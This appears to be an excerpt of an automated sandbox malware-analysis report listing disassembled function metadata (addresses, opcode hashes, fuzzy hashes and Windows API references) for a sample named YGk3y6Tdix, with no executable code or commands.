Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a32c7d199a4756fe7d58a1cd0b2f0bd4eb0a346c61b6b0c06352bf3261b28ff0
Instruction ID: 1355f83485488fde83d9d620eb437644b3dcc880c94db92bc4c93d973e7e306f
Opcode Fuzzy Hash: a32c7d199a4756fe7d58a1cd0b2f0bd4eb0a346c61b6b0c06352bf3261b28ff0
Instruction Fuzzy Hash: F5415AB0905B40DEE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB356654DB10

Function 00FA13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA13E1

Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C

Part of subcall function 00FACE40: __EH_prolog.LIBCMT ref: 00FACE45

Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dfb70fe4737914e3c255c40a42de6a5ebed26a67a0f7084a9be519ca737ec0e7
Instruction ID: 783bb2049cf963e01d905a790bcb49996722c0ca43777dbb023ce36fa4e8fa22
Opcode Fuzzy Hash: dfb70fe4737914e3c255c40a42de6a5ebed26a67a0f7084a9be519ca737ec0e7
Instruction Fuzzy Hash: 344168B0905B409EE724DF398885AE6FBE5BF19310F544A2ED5FE83282CB356654DB10

Function 00FBB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FBB098

Part of subcall function 00FA13DC: __EH_prolog.LIBCMT ref: 00FA13E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 95b5bea0468990eb1dc87b32f54d7d6dcb081ae4d629ac510e1520cee16cfc01
Instruction ID: 5179c51ecbca2d008f57538ca52d4e4dd47a5638680718af0367d442d4ee4dd1
Opcode Fuzzy Hash: 95b5bea0468990eb1dc87b32f54d7d6dcb081ae4d629ac510e1520cee16cfc01
Instruction Fuzzy Hash: 14316DB5C002499ECF15DFA9CD51AEEBBB4AF09304F10449EE409B7242D779AE04EF61

Function 00FCAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00FCACF8

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: d826cff0e69b17bbf533149634be115ba625244c14ceca2ba2cde0c782dc16e8
Instruction ID: cab7234203727824be2d80a485909ce8e05227629e47f82510d46a84cd1b9f1c
Opcode Fuzzy Hash: d826cff0e69b17bbf533149634be115ba625244c14ceca2ba2cde0c782dc16e8
Instruction Fuzzy Hash: 5811EB33A0162F5F9B22DE28DD42E5A73569B843387164215ED25AB244D630FC01A7D2

Function 00FACE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FACE45

Part of subcall function 00FA5E37: __EH_prolog.LIBCMT ref: 00FA5E3C

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5d1ad105d5744f2ed9a8547ae9bf8f0e6166101198cf0a0c4eb8e146cea6d313
Instruction ID: b94fde71ab87763c97d0257a5c4ddae311d23c49c7655156ef6f87e515f31dcb
Opcode Fuzzy Hash: 5d1ad105d5744f2ed9a8547ae9bf8f0e6166101198cf0a0c4eb8e146cea6d313
Instruction Fuzzy Hash: 6711C6B1A01244DEEB14DB79C9457EEB7E89F95300F10445EE446D3282DB7C4F04EBA2

Function 00FA9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA921A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fed80d16bfa7d38f28b9fd015b4ff2cd778f602bf7c796e71f68b991c411d5d1
Instruction ID: 91261eda1543395993567d73dbee084c22f4e118e73246ade396f02a87cc7540
Opcode Fuzzy Hash: fed80d16bfa7d38f28b9fd015b4ff2cd778f602bf7c796e71f68b991c411d5d1
Instruction Fuzzy Hash: 800169B3D00524ABCF12AF68CD81ADEB775BF8A750F054525F816B7152DA788D04E6A0

Function 00FCC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FCB177

_free.LIBCMT ref: 00FCC4E5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 20bfe9eb15d8c28393a9829fd6662d677ace7f134091ada8eed882b6c901ed95
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 8A01D6726003066BE335CE69DC86F6AFBEDEB85370F25051DE59883281EA30A905C764

Function 00FCB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FCB177

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dcc5457013091b01754777a75a7836d05dae741e6239f7f1118bfbe314d51007
Instruction ID: 78f80b3f3192aa8be306a7e2cb795a291f0c5c3c6107dc2edb40b5af4ed5ea54
Opcode Fuzzy Hash: dcc5457013091b01754777a75a7836d05dae741e6239f7f1118bfbe314d51007
Instruction Fuzzy Hash: 03F0B43AD0912767DB215B21AE1BF9F3748AB41770F1D811AB80896190CB26D905A6E0

Function 00FC3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00FC3C3F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 3649c7fdf259223995c75621b566373336b702991bc73f35cca65000ab0034b6
Instruction ID: 29b4a32759ac9472ee512b3e201ac30eebb583062f452bb9e9ad1368baa95f2a
Opcode Fuzzy Hash: 3649c7fdf259223995c75621b566373336b702991bc73f35cca65000ab0034b6
Instruction Fuzzy Hash: F8F0823660021B9FCF12CE68ED05F9E77D9AB41BB47148129FA15E6190DB31DA20F790

Function 00FC8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c5043c56fdc5d015ff177aa1c656af5f146befda39297eab139c0bfc86d1b9d
Instruction ID: dd6b22d21e0cdcc741c5d524a1a8d4325fe921cafd07c35c24d1910b4aaa0bce
Opcode Fuzzy Hash: 0c5043c56fdc5d015ff177aa1c656af5f146befda39297eab139c0bfc86d1b9d
Instruction Fuzzy Hash: 65E06531A0621756DB7137E59F0BF9B76489B817F4F150119AC5897091CF65CC03B2E1

Function 00FA5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA5AC2

Part of subcall function 00FAB505: __EH_prolog.LIBCMT ref: 00FAB50A

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 23508265a1812e8ad930abf5408f9d18cff963888b4a5d82e075a209cd71eda1
Instruction ID: ce7f5296c6513b41277539f53f253494bd4b0bc6e518f487e96de53e89bffc24
Opcode Fuzzy Hash: 23508265a1812e8ad930abf5408f9d18cff963888b4a5d82e075a209cd71eda1
Instruction Fuzzy Hash: C2018C30810690DED729E7B8C8417DEFBB59F64304F54848EA45653283CFB81B08EBA2

Function 00FAA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00FAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6C4
Part of subcall function 00FAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6F2
Part of subcall function 00FAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FAA592,000000FF,?,?), ref: 00FAA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: bc869197020c82580f6de5cdfec89aa44a4b2de08fcd976dbc7a5d6e2dd581f3
Instruction ID: b006183c0a69052f11978b1c9b0fc16349855fc93285040f953adb60260d84ad
Opcode Fuzzy Hash: bc869197020c82580f6de5cdfec89aa44a4b2de08fcd976dbc7a5d6e2dd581f3
Instruction Fuzzy Hash: 34F05476409790AACB225BB48D047C67B905F1B331F048A49F1F952196C3655098EB23

Function 00FB0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00FB0E3D

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: ee8527453af6c3361cea6c213919f85d77df65b020e5d8d6c047937305a9390c
Instruction ID: 3be75e8a28f14110e9f69809f6f03b701d91bb7492a6895ea2f59d8f6d1cf4c7
Opcode Fuzzy Hash: ee8527453af6c3361cea6c213919f85d77df65b020e5d8d6c047937305a9390c
Instruction Fuzzy Hash: 9AD05B21A0109956DB11733B6C79BFF36069FC7331F0D0066F2459B193CE5C4886B672

Function 00FBA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00FBA62C

Part of subcall function 00FBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00FBA3DA

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: f7deff7928898b42c6cb4e445242ab4261037baebda745f880fbb43c8cc99fa9
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 85D0C77161020976DF466B638C129EE7696EB40350F048125B841D5151EEB5D910B952

Function 00FBE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00FBE5E3

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 31f6d51b4012333e84cfd0b9723f0e3c62612ec51ae8db21bfb0052bd070be5d
Instruction ID: 0df52746a078a2593379588e8ad078a9cfc44f635f651e5ea5c96ab6852e64ad
Opcode Fuzzy Hash: 31f6d51b4012333e84cfd0b9723f0e3c62612ec51ae8db21bfb0052bd070be5d
Instruction Fuzzy Hash: 9ED0A9B04402448AD223EBAB9942FC43391B320B10F980001B1C8C1088CA78C080BF01

Function 00FBDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FB1B3E), ref: 00FBDD92

Part of subcall function 00FBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FBB579
Part of subcall function 00FBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FBB58A
Part of subcall function 00FBB568: IsDialogMessageW.USER32(00010416,?), ref: 00FBB59E
Part of subcall function 00FBB568: TranslateMessage.USER32(?), ref: 00FBB5AC
Part of subcall function 00FBB568: DispatchMessageW.USER32(?), ref: 00FBB5B6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: f8a59494baf2d601f1fdb7ab1e06200cc7bfeee754735d58b11aad5d69de0fc3
Instruction ID: 0bb676302e1f6c5d93fe14928ebc4eeb5fb5512a8c0de50627b1ce93e91a20ba
Opcode Fuzzy Hash: f8a59494baf2d601f1fdb7ab1e06200cc7bfeee754735d58b11aad5d69de0fc3
Instruction Fuzzy Hash: BAD09E31144300BADA126B52DD06F4B7AA2BB88B04F004554B285740F18A769D21EF12

Function 00FA98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00FA97BE), ref: 00FA98C8

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b92889302911c65563298f10d587257e3a1b975d2f496cad8940dcf9bafb3cb3
Instruction ID: ddfaac2ee8bf8f06b10c17dcce7c6266a4fcb790f472c570f3b61085281215ae
Opcode Fuzzy Hash: b92889302911c65563298f10d587257e3a1b975d2f496cad8940dcf9bafb3cb3
Instruction Fuzzy Hash: 64C002B8808209968E219B3498490997722AE533BA7F496A5D169890A1C36ACC9BFA11

Function 00FBE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00f91f38add60be9d5a9567a8f264affd0536cdd45eb98fe1117386567873c4e
Instruction ID: abfb76359155d2e103ee78661b063b9cb04c184043e25b7e52ba083a2adf8e2b
Opcode Fuzzy Hash: 00f91f38add60be9d5a9567a8f264affd0536cdd45eb98fe1117386567873c4e
Instruction Fuzzy Hash: 0DB012D2358501EC3005520B6D02EF7015ED1C5B10334C02FFC05C42C0D840EC043CB2

Function 00FBE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

